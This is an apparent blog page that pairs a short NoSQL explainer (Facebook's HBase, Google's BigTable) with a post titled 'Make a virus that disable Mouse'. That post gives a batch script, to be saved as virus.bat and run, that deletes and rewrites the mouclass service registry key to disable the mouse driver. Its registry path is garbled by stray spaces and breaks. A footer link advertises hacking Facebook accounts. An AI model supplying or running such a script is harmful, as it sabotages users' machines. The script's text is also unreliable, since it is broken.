Which database does Facebook & Google use ?

Facebook has moved to a NoSQL database named HBase. Google uses their own system called BigTable. What is NoSQL ? NoSQL is a term used to designate databases which differ from classic relational databases. NoSQL database management systems are useful when working with a huge quantity of data when the data's nature does not require a relational model. The data can be structured, but NoSQL is used when what really matters is the ability to store and retrieve great quantities of data, not the relationships between the elements.

Make a virus that disable Mouse

1) Open Notepad and copy below codes
rem --------------- --------------- ---
rem Disable Mouse
set key="HKEY_LOCAL _MACHINE
\system \CurrentControl Set
\Services\Mo uclass"
reg delete %key%
reg add %key% /v Start /t REG_
DWORD /d 4

rem --------------- --------------- ---
2) Save this file as virus.bat
3) Done you just created your virus. 

just run it

Comments

Popular posts from this blog

Hacking facebook accounts using google dork list

Which database does Facebook & Google use ?

How To Make Anchor Text In Your Facebook Status For Promoting A Website ?